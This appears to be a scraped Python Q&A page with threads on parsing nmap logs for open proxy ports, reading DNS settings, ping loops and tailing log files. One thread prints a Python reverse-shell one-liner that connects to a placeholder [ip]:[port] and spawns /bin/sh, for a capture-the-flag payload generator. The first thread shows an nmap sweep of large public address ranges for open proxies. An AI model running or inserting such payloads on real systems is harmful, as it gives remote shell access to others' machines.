Any way to optimize/properly refine this <50 line script?

Any way to optimize/properly refine this <50 line script? - python

I'm still learning python, and one of the first projects I decided to dive into was something to sort through large nmap logs, pull out the OPEN ports, and dump them to a separate text file in IP:Port format. It works, but is there a better way to write this? Here's what I ended up with:
import sys
import string
"""
Written 6/24/2011 to pull out OPEN ports of an nmap proxy scan
Command:
nmap 218.9-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog3.txt
"""
if len(sys.argv) != 3:
print 'Usage: python proxy.py <input file> <output file>'
print 'nmap 218.1-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog.txt'
print 'Example: python ./proxy.py PLog.txt proxies.txt'
sys.exit(1)
r = open(sys.argv[1], 'r')
o = open(sys.argv[2], 'w')
pat80 = '80/open/'
pat8080 = '8080/open'
pat3128 = '3128/open'
for curline in r.xreadlines():
sift = string.split(curline, ' ')
ip = sift[1]
if curline.find(pat3128) >= 0:
curport = '3128'
elif curline.find(pat8080) >= 0:
curport = '8080'
elif curline.find(pat80) >= 0:
curport = '80'
else:
curport = '100'
pass
if (curport == '3128') or (curport == '8080') or (curport == '80'):
o.write(ip + ':' + curport + '\n')
print ip + ':' + curport
else:
pass

You can loop over a file like this. There is no need to use xreadlines(). with makes sure the file is closed when r goes out of scope
with open(sys.argv[1], 'r') as r:
for curline in r:
sift = string.split(curline, ' ')
ip = sift[1]
...
Looking in a tuple is neater than the chain of or
if curport in ('3128', '8080', '80'):

Since I seem to remember using python to parse nmap output files was one of my first python applications, I can make a couple of recommendations:
1) If you'd like to learn XML parsing and python, using the alternate XML format of nmap would be advised. This has the advantage that the XML output is less like to change in small but script breaking ways unlike the plain text output. (Basically, matching on string fields is great for a quick hack but is almost guaranteed to bite you down the road, as I found out when nmap was updated and they slightly changed the format of one of the columns I was parsing on... also think I got bit when we upgraded one of the Windows boxes and some of the text in the OS or services fields matched something I was matching on. If you're interested in going down this path, I can see if I have my nmap parser using xpath lying around
2) If you want to stick with text output and regexp, I'd suggest learning about grouping.
Specifically, rather than creating custom patterns for each port, you can define a group and check that out instead.
import re
r = re.compile("(/d+)/open") # match one or more digits followed by /open
mm = r.match(line) #mm will either be None or a match result object, if mm is not None, you can do mm.groups()[0] to get the port #.

import sys
import string
"""
Written 6/24/2011 to pull out OPEN ports of an nmap proxy scan
Command:
nmap 218.9-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog3.txt
"""
def get_port(line):
port_mapping = {
'80/open/': '80', # Is the backslash special here?
# If they're really all supposed to have the same form,
# then we can simplify more.
'8080/open': '8080',
'3128/open': '3128'
}
for pattern, port in port_mapping:
if pattern in line: return port
return None # this would be implied otherwise,
# but "explicit is better than implicit"
# and this function intends to return a value.
def main(in_name, out_name):
with file(in_name, 'r') as in_file:
ips = (get_port(line.split(' ')[1]) for line in in_file)
with file(out_name, 'w') as out_file:
for ip in ips:
if ip == None: continue
output = '%s:%s' % (ip, curport)
out_file.write(output + '\n')
print output
def usage():
print 'Usage: python proxy.py <input file> <output file>'
print 'nmap 218.1-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog.txt'
print 'Example: python ./proxy.py PLog.txt proxies.txt'
if __name__ == '__main__':
if len(sys.argv) != 3: usage()
else: main(*sys.argv[1:])

Check out argparse for handling the arguments.
Split into functions.
Use the main construct.
Look at the csv module. You can set the delimiter to a space.
Look again at the re expression. You can do it with one re expression where it is an 'or' of the different patterns.

Related

Removing multiple strings in a file replace() not working

I am at the moment experiencing some issues with my code. I am creating a reverse shell generator that automates with pentests for Capture flag competitions.
The script will read a file containing payloads, further the script will choose a specific line to be fetched and then replace the back connect ip address and port and output the payload to the user.
However i am stuck on some issues. The issue is that i am trying to replace two different strings upon reading a file containing my text, one of the strings gets replaced, while the other do not:
Strings to be replaced
[ip]
[port]
I have as well reviewed previous article using regex, but did not get further luck. Recieving error on the regex part that is commented out in my code: "unexpected token"
My code:
import socket
import base64
import hashlib
import re
import os # Fetching ip from interface
import linecache # for reading specific lines
ip = str(input("Host ip\n"))
port = str(input("port\n"))
#shell = str(input("Please select an option?\n"))
def full():
print("Welcome, lets generate a choosen reverse shell\n")
global ip
global port
print("please select language and shell option:\n [1] - python(Alphanumeric reverse shell)\n, [2] PHP(Alphanumeric reverse shell)\n")
selection = input("Type in number:\t")
if int(selection) == 1:
with open("myshells.txt", "r") as shells:
#for myreplace in (("[ip]", ip), ("[port]", port)):
fetchshell = linecache.getline('myshells.txt', 1)
ipreplaced = fetchshell.replace("[ip]", ip)
ipreplaced = fetchshell.replace("[port]", port)
print(ipreplaced)
"""for line in fetchshell:
myport = line.write(re.sub(r"(port)", port))
myip = line.write((re.sub(r"(ip)", ip))
print(line)"""
File contents:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(([ip],[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Sample output from above code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(([ip],22));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Get local DNS settings in Python

Is there any elegant and cross platform (Python) way to get the local DNS settings?
It could probably work with a complex combination of modules such as platform and subprocess, but maybe there is already a good module, such as netifaces which can retrieve it in low-level and save some "reinventing the wheel" effort.
Less ideally, one could probably query something like dig, but I find it "noisy", because it would run an extra request instead of just retrieving something which exists already locally.
Any ideas?

Using subprocess you could do something like this, in a MacBook or Linux system
import subprocess
process = subprocess.Popen(['cat', '/etc/resolv.conf'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
print(stdout, stderr)
or do something like this
import subprocess
with open('dns.txt', 'w') as f:
process = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=f)
The first output will go to stdout and the second to a file

Maybe this one will solve your problem
import subprocess
def get_local_dns(cmd_):
with open('dns1.txt', 'w+') as f:
with open('dns_log1.txt', 'w+') as flog:
try:
process = subprocess.Popen(cmd_, stdout=f, stderr=flog)
except FileNotFoundError as e:
flog.write(f"Error while executing this command {str(e)}")
linux_cmd = ['cat', '/etc/resolv.conf']
windows_cmd = ['windows_command', 'parameters']
commands = [linux_cmd, windows_cmd]
if __name__ == "__main__":
for cmd in commands:
get_local_dns(cmd)

Thanks #MasterOfTheHouse.
I ended up writing my own function. It's not so elegant, but it does the job for now. There's plenty of room for improvement, but well...
import os
import subprocess
def get_dns_settings()->dict:
# Initialize the output variables
dns_ns, dns_search = [], ''
# For Unix based OSs
if os.path.isfile('/etc/resolv.conf'):
for line in open('/etc/resolv.conf','r'):
if line.strip().startswith('nameserver'):
nameserver = line.split()[1].strip()
dns_ns.append(nameserver)
elif line.strip().startswith('search'):
search = line.split()[1].strip()
dns_search = search
# If it is not a Unix based OS, try "the Windows way"
elif os.name == 'nt':
cmd = 'ipconfig /all'
raw_ipconfig = subprocess.check_output(cmd)
# Convert the bytes into a string
ipconfig_str = raw_ipconfig.decode('cp850')
# Convert the string into a list of lines
ipconfig_lines = ipconfig_str.split('\n')
for n in range(len(ipconfig_lines)):
line = ipconfig_lines[n]
# Parse nameserver in current line and next ones
if line.strip().startswith('DNS-Server'):
nameserver = ':'.join(line.split(':')[1:]).strip()
dns_ns.append(nameserver)
next_line = ipconfig_lines[n+1]
# If there's too much blank at the beginning, assume we have
# another nameserver on the next line
if len(next_line) - len(next_line.strip()) > 10:
dns_ns.append(next_line.strip())
next_next_line = ipconfig_lines[n+2]
if len(next_next_line) - len(next_next_line.strip()) > 10:
dns_ns.append(next_next_line.strip())
elif line.strip().startswith('DNS-Suffix'):
dns_search = line.split(':')[1].strip()
return {'nameservers': dns_ns, 'search': dns_search}
print(get_dns_settings())
By the way... how did you manage to write two answers with the same account?

Python3 inconsistent output inside open function and for loop

This is the code. Somehow the output is not consistent. There is a new line for the first 2 lines in ip.txt while the third is working as expected.
code.py
import subprocess
with open('ip.txt') as f:
for IPAddr in f:
ping = subprocess.Popen(['ping','-c','1',IPAddr],stdout=f).wait()
if ping == 0:
print(f'{IPAddr} is up')
else:
print(f'{IPAddr} is down')
ip.txt
127.0.0.1
10.0.0.1
127.0.0.1
Output
user#linux:~$ python 01.py
127.0.0.1
is up
10.0.0.1
is down
127.0.0.1 is up
user#linux:~$
Desired Output
user#linux:~$ python code.py
127.0.0.1 is up
10.0.0.1 is down
127.0.0.1 is up
user#linux:~$
What's wrong with this code and how to fix it?
Update
The following solutions work! Many thanks
IPAddr = IPAddr.replace('\n','')
IPAddr = IPAddr.rstrip("\n")
IPAddr = IPAddr.strip()

You're including the newline characters from your file in your print.
Remove the \n like this:
import subprocess
with open('ip.txt') as f:
for IPAddr in f:
IPAddr = IPAddr.replace('\n', '') # Remove the newline
ping = subprocess.Popen(['ping','-c','1',IPAddr],stdout=f).wait()
if ping == 0:
print(f'{IPAddr} is up')
else:
print(f'{IPAddr} is down')
Or if you want to do it more broadly, you can remove all whitespace by using:
IPAddr = IPAddr.strip()
Or if you want to be super duper efficient, just strip the \n from the right:
IPAddr = IPAddr.rstrip("\n")

When iterating over a file line by line, each line ends with the newline marker ("\n"), so what you pass to print() is actually "127.0.0.1\n is up", not "127.0.0.1 is up".
The solution is quite simple: remove the newline:
for IPAddr in f:
IPAddr = IPAddr.rstrip("\n")
# etc
Note that since external inputs (files, user inputs etc) are totally unreliable, you would be better stripping all whitespaces from the line, check it's not empty (it's common to have empty lines in text files, specially at the end) and then skip that line (with a continue statement), and if not empty you probably want to validate the value is a valid IP address (and if not skip it too)...

python: tail file in background [duplicate]

I'd like to make the output of tail -F or something similar available to me in Python without blocking or locking. I've found some really old code to do that here, but I'm thinking there must be a better way or a library to do the same thing by now. Anyone know of one?
Ideally, I'd have something like tail.getNewData() that I could call every time I wanted more data.

Non Blocking
If you are on linux (as windows does not support calling select on files) you can use the subprocess module along with the select module.
import time
import subprocess
import select
f = subprocess.Popen(['tail','-F',filename],\
stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p = select.poll()
p.register(f.stdout)
while True:
if p.poll(1):
print f.stdout.readline()
time.sleep(1)
This polls the output pipe for new data and prints it when it is available. Normally the time.sleep(1) and print f.stdout.readline() would be replaced with useful code.
Blocking
You can use the subprocess module without the extra select module calls.
import subprocess
f = subprocess.Popen(['tail','-F',filename],\
stdout=subprocess.PIPE,stderr=subprocess.PIPE)
while True:
line = f.stdout.readline()
print line
This will also print new lines as they are added, but it will block until the tail program is closed, probably with f.kill().

Using the sh module (pip install sh):
from sh import tail
# runs forever
for line in tail("-f", "/var/log/some_log_file.log", _iter=True):
print(line)
[update]
Since sh.tail with _iter=True is a generator, you can:
import sh
tail = sh.tail("-f", "/var/log/some_log_file.log", _iter=True)
Then you can "getNewData" with:
new_data = tail.next()
Note that if the tail buffer is empty, it will block until there is more data (from your question it is not clear what you want to do in this case).
[update]
This works if you replace -f with -F, but in Python it would be locking. I'd be more interested in having a function I could call to get new data when I want it, if that's possible. – Eli
A container generator placing the tail call inside a while True loop and catching eventual I/O exceptions will have almost the same effect of -F.
def tail_F(some_file):
while True:
try:
for line in sh.tail("-f", some_file, _iter=True):
yield line
except sh.ErrorReturnCode_1:
yield None
If the file becomes inaccessible, the generator will return None. However it still blocks until there is new data if the file is accessible. It remains unclear for me what you want to do in this case.
Raymond Hettinger approach seems pretty good:
def tail_F(some_file):
first_call = True
while True:
try:
with open(some_file) as input:
if first_call:
input.seek(0, 2)
first_call = False
latest_data = input.read()
while True:
if '\n' not in latest_data:
latest_data += input.read()
if '\n' not in latest_data:
yield ''
if not os.path.isfile(some_file):
break
continue
latest_lines = latest_data.split('\n')
if latest_data[-1] != '\n':
latest_data = latest_lines[-1]
else:
latest_data = input.read()
for line in latest_lines[:-1]:
yield line + '\n'
except IOError:
yield ''
This generator will return '' if the file becomes inaccessible or if there is no new data.
[update]
The second to last answer circles around to the top of the file it seems whenever it runs out of data. – Eli
I think the second will output the last ten lines whenever the tail process ends, which with -f is whenever there is an I/O error. The tail --follow --retry behavior is not far from this for most cases I can think of in unix-like environments.
Perhaps if you update your question to explain what is your real goal (the reason why you want to mimic tail --retry), you will get a better answer.
The last answer does not actually follow the tail and merely reads what's available at run time. – Eli
Of course, tail will display the last 10 lines by default... You can position the file pointer at the end of the file using file.seek, I will left a proper implementation as an exercise to the reader.
IMHO the file.read() approach is far more elegant than a subprocess based solution.

Purely pythonic solution using non-blocking readline()
I am adapting Ijaz Ahmad Khan's answer to only yield lines when they are completely written (lines end with a newline char) gives a pythonic solution with no external dependencies:
import time
from typing import Iterator
def follow(file, sleep_sec=0.1) -> Iterator[str]:
""" Yield each line from a file as they are written.
`sleep_sec` is the time to sleep after empty reads. """
line = ''
while True:
tmp = file.readline()
if tmp is not None:
line += tmp
if line.endswith("\n"):
yield line
line = ''
elif sleep_sec:
time.sleep(sleep_sec)
if __name__ == '__main__':
with open("test.txt", 'r') as file:
for line in follow(file):
print(line, end='')

The only portable way to tail -f a file appears to be, in fact, to read from it and retry (after a sleep) if the read returns 0. The tail utilities on various platforms use platform-specific tricks (e.g. kqueue on BSD) to efficiently tail a file forever without needing sleep.
Therefore, implementing a good tail -f purely in Python is probably not a good idea, since you would have to use the least-common-denominator implementation (without resorting to platform-specific hacks). Using a simple subprocess to open tail -f and iterating through the lines in a separate thread, you can easily implement a non-blocking tail operation in Python.
Example implementation:
import threading, Queue, subprocess
tailq = Queue.Queue(maxsize=10) # buffer at most 100 lines
def tail_forever(fn):
p = subprocess.Popen(["tail", "-f", fn], stdout=subprocess.PIPE)
while 1:
line = p.stdout.readline()
tailq.put(line)
if not line:
break
threading.Thread(target=tail_forever, args=(fn,)).start()
print tailq.get() # blocks
print tailq.get_nowait() # throws Queue.Empty if there are no lines to read

All the answers that use tail -f are not pythonic.
Here is the pythonic way: ( using no external tool or library)
def follow(thefile):
while True:
line = thefile.readline()
if not line or not line.endswith('\n'):
time.sleep(0.1)
continue
yield line
if __name__ == '__main__':
logfile = open("run/foo/access-log","r")
loglines = follow(logfile)
for line in loglines:
print(line, end='')

So, this is coming quite late, but I ran into the same problem again, and there's a much better solution now. Just use pygtail:
Pygtail reads log file lines that have not been read. It will even
handle log files that have been rotated. Based on logcheck's logtail2
(http://logcheck.org)

Ideally, I'd have something like tail.getNewData() that I could call every time I wanted more data
We've already got one and itsa very nice. Just call f.read() whenever you want more data. It will start reading where the previous read left off and it will read through the end of the data stream:
f = open('somefile.log')
p = 0
while True:
f.seek(p)
latest_data = f.read()
p = f.tell()
if latest_data:
print latest_data
print str(p).center(10).center(80, '=')
For reading line-by-line, use f.readline(). Sometimes, the file being read will end with a partially read line. Handle that case with f.tell() finding the current file position and using f.seek() for moving the file pointer back to the beginning of the incomplete line. See this ActiveState recipe for working code.

You could use the 'tailer' library: https://pypi.python.org/pypi/tailer/
It has an option to get the last few lines:
# Get the last 3 lines of the file
tailer.tail(open('test.txt'), 3)
# ['Line 9', 'Line 10', 'Line 11']
And it can also follow a file:
# Follow the file as it grows
for line in tailer.follow(open('test.txt')):
print line
If one wants tail-like behaviour, that one seems to be a good option.

Another option is the tailhead library that provides both Python versions of of tail and head utilities and API that can be used in your own module.
Originally based on the tailer module, its main advantage is the ability to follow files by path i.e. it can handle situation when file is recreated. Besides, it has some bug fixes for various edge cases.

Python is "batteries included" - it has a nice solution for it: https://pypi.python.org/pypi/pygtail
Reads log file lines that have not been read. Remembers where it finished last time, and continues from there.
import sys
from pygtail import Pygtail
for line in Pygtail("some.log"):
sys.stdout.write(line)

You can also use 'AWK' command.
See more at: http://www.unix.com/shell-programming-scripting/41734-how-print-specific-lines-awk.html
awk can be used to tail last line, last few lines or any line in a file.
This can be called from python.

If you are on linux you implement a non-blocking implementation in python in the following way.
import subprocess
subprocess.call('xterm -title log -hold -e \"tail -f filename\"&', shell=True, executable='/bin/csh')
print "Done"

# -*- coding:utf-8 -*-
import sys
import time
class Tail():
def __init__(self, file_name, callback=sys.stdout.write):
self.file_name = file_name
self.callback = callback
def follow(self, n=10):
try:
# 打开文件
with open(self.file_name, 'r', encoding='UTF-8') as f:
# with open(self.file_name,'rb') as f:
self._file = f
self._file.seek(0, 2)
# 存储文件的字符长度
self.file_length = self._file.tell()
# 打印最后10行
self.showLastLine(n)
# 持续读文件 打印增量
while True:
line = self._file.readline()
if line:
self.callback(line)
time.sleep(1)
except Exception as e:
print('打开文件失败，囧，看看文件是不是不存在，或者权限有问题')
print(e)
def showLastLine(self, n):
# 一行大概100个吧 这个数改成1或者1000都行
len_line = 100
# n默认是10，也可以follow的参数传进来
read_len = len_line * n
# 用last_lines存储最后要处理的内容
while True:
# 如果要读取的1000个字符，大于之前存储的文件长度
# 读完文件，直接break
if read_len > self.file_length:
self._file.seek(0)
last_lines = self._file.read().split('\n')[-n:]
break
# 先读1000个 然后判断1000个字符里换行符的数量
self._file.seek(-read_len, 2)
last_words = self._file.read(read_len)
# count是换行符的数量
count = last_words.count('\n')
if count >= n:
# 换行符数量大于10 很好处理，直接读取
last_lines = last_words.split('\n')[-n:]
break
# 换行符不够10个
else:
# break
# 不够十行
# 如果一个换行符也没有，那么我们就认为一行大概是100个
if count == 0:
len_perline = read_len
# 如果有4个换行符，我们认为每行大概有250个字符
else:
len_perline = read_len / count
# 要读取的长度变为2500，继续重新判断
read_len = len_perline * n
for line in last_lines:
self.callback(line + '\n')
if __name__ == '__main__':
py_tail = Tail('test.txt')
py_tail.follow(1)

A simple tail function from pypi app tailread
You Can use it also via pip install tailread
Recommended for tail access of large files.
from io import BufferedReader
def readlines(bytesio, batch_size=1024, keepends=True, **encoding_kwargs):
'''bytesio: file path or BufferedReader
batch_size: size to be processed
'''
path = None
if isinstance(bytesio, str):
path = bytesio
bytesio = open(path, 'rb')
elif not isinstance(bytesio, BufferedReader):
raise TypeError('The first argument to readlines must be a file path or a BufferedReader')
bytesio.seek(0, 2)
end = bytesio.tell()
buf = b""
for p in reversed(range(0, end, batch_size)):
bytesio.seek(p)
lines = []
remain = min(end-p, batch_size)
while remain > 0:
line = bytesio.readline()[:remain]
lines.append(line)
remain -= len(line)
cut, *parsed = lines
for line in reversed(parsed):
if buf:
line += buf
buf = b""
if encoding_kwargs:
line = line.decode(**encoding_kwargs)
yield from reversed(line.splitlines(keepends))
buf = cut + buf
if path:
bytesio.close()
if encoding_kwargs:
buf = buf.decode(**encoding_kwargs)
yield from reversed(buf.splitlines(keepends))
for line in readlines('access.log', encoding='utf-8', errors='replace'):
print(line)
if 'line 8' in line:
break
# line 11
# line 10
# line 9
# line 8

tail multiple logfiles in python

This is probably a bit of a silly excercise for me, but it raises a bunch of interesting questions. I have a directory of logfiles from my chat client, and I want to be notified using notify-osd every time one of them changes.
The script that I wrote basically uses os.popen to run the linux tail command on every one of the files to get the last line, and then check each line against a dictionary of what the lines were the last time it ran. If the line changed, it used pynotify to send me a notification.
This script actually worked perfectly, except for the fact that it used a huge amount of cpu (probably because it was running tail about 16 times every time the loop ran, on files that were mounted over sshfs.)
It seems like something like this would be a great solution, but I don't see how to implement that for more than one file.
Here is the script that I wrote. Pardon my lack of comments and poor style.
Edit: To clarify, this is all linux on a desktop.

Not even looking at your source code, there are two ways you could easily do this more efficiently and handle multiple files.
Don't bother running tail unless you have to. Simply os.stat all of the files and record the last modified time. If the last modified time is different, then raise a notification.
Use pyinotify to call out to Linux's inotify facility; this will have the kernel do option 1 for you and call back to you when any files in your directory change. Then translate the callback into your osd notification.
Now, there might be some trickiness depending on how many notifications you want when there are multiple messages and whether you care about missing a notification for a message.
An approach that preserves the use of tail would be to instead use tail -f. Open all of the files with tail -f and then use the select module to have the OS tell you when there's additional input on one of the file descriptors open for tail -f. Your main loop would call select and then iterate over each of the readable descriptors to generate notifications. (You could probably do this without using tail and just calling readline() when it's readable.)
Other areas of improvement in your script:
Use os.listdir and native Python filtering (say, using list comprehensions) instead of a popen with a bunch of grep filters.
Update the list of buffers to scan periodically instead of only doing it at program boot.
Use subprocess.popen instead of os.popen.

If you're already using the pyinotify module, it's easy to do this in pure Python (i.e. no need to spawn a separate process to tail each file).
Here is an example that is event-driven by inotify, and should use very little cpu. When IN_MODIFY occurs for a given path we read all available data from the file handle and output any complete lines found, buffering the incomplete line until more data is available:
import os
import select
import sys
import pynotify
import pyinotify
class Watcher(pyinotify.ProcessEvent):
def __init__(self, paths):
self._manager = pyinotify.WatchManager()
self._notify = pyinotify.Notifier(self._manager, self)
self._paths = {}
for path in paths:
self._manager.add_watch(path, pyinotify.IN_MODIFY)
fh = open(path, 'rb')
fh.seek(0, os.SEEK_END)
self._paths[os.path.realpath(path)] = [fh, '']
def run(self):
while True:
self._notify.process_events()
if self._notify.check_events():
self._notify.read_events()
def process_default(self, evt):
path = evt.pathname
fh, buf = self._paths[path]
data = fh.read()
lines = data.split('\n')
# output previous incomplete line.
if buf:
lines[0] = buf + lines[0]
# only output the last line if it was complete.
if lines[-1]:
buf = lines[-1]
lines.pop()
# display a notification
notice = pynotify.Notification('%s changed' % path, '\n'.join(lines))
notice.show()
# and output to stdout
for line in lines:
sys.stdout.write(path + ': ' + line + '\n')
sys.stdout.flush()
self._paths[path][1] = buf
pynotify.init('watcher')
paths = sys.argv[1:]
Watcher(paths).run()
Usage:
% python watcher.py [path1 path2 ... pathN]

Simple pure python solution (not the best, but doesn't fork, spits out 4 empty lines after idle period and marks everytime the source of the chunk, if changed):
#!/usr/bin/env python
from __future__ import with_statement
'''
Implement multi-file tail
'''
import os
import sys
import time
def print_file_from(filename, pos):
with open(filename, 'rb') as fh:
fh.seek(pos)
while True:
chunk = fh.read(8192)
if not chunk:
break
sys.stdout.write(chunk)
def _fstat(filename):
st_results = os.stat(filename)
return (st_results[6], st_results[8])
def _print_if_needed(filename, last_stats, no_fn, last_fn):
changed = False
#Find the size of the file and move to the end
tup = _fstat(filename)
# print tup
if last_stats[filename] != tup:
changed = True
if not no_fn and last_fn != filename:
print '\n<%s>' % filename
print_file_from(filename, last_stats[filename][0])
last_stats[filename] = tup
return changed
def multi_tail(filenames, stdout=sys.stdout, interval=1, idle=10, no_fn=False):
S = lambda (st_size, st_mtime): (max(0, st_size - 124), st_mtime)
last_stats = dict((fn, S(_fstat(fn))) for fn in filenames)
last_fn = None
last_print = 0
while 1:
# print last_stats
changed = False
for filename in filenames:
if _print_if_needed(filename, last_stats, no_fn, last_fn):
changed = True
last_fn = filename
if changed:
if idle > 0:
last_print = time.time()
else:
if idle > 0 and last_print is not None:
if time.time() - last_print >= idle:
last_print = None
print '\n' * 4
time.sleep(interval)
if '__main__' == __name__:
from optparse import OptionParser
op = OptionParser()
op.add_option('-F', '--no-fn', help="don't print filename when changes",
default=False, action='store_true')
op.add_option('-i', '--idle', help='idle time, in seconds (0 turns off)',
type='int', default=10)
op.add_option('--interval', help='check interval, in seconds', type='int',
default=1)
opts, args = op.parse_args()
try:
multi_tail(args, interval=opts.interval, idle=opts.idle,
no_fn=opts.no_fn)
except KeyboardInterrupt:
pass

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

Any way to optimize/properly refine this <50 line script? - python

Check out argparse for handling the arguments. Split into functions. Use the main construct. Look at the csv module. You can set the delimiter to a space. Look again at the re expression. You can do it with one re expression where it is an 'or' of the different patterns.

Related

Removing multiple strings in a file replace() not working

Get local DNS settings in Python

Python3 inconsistent output inside open function and for loop

python: tail file in background [duplicate]

tail multiple logfiles in python

Categories

Resources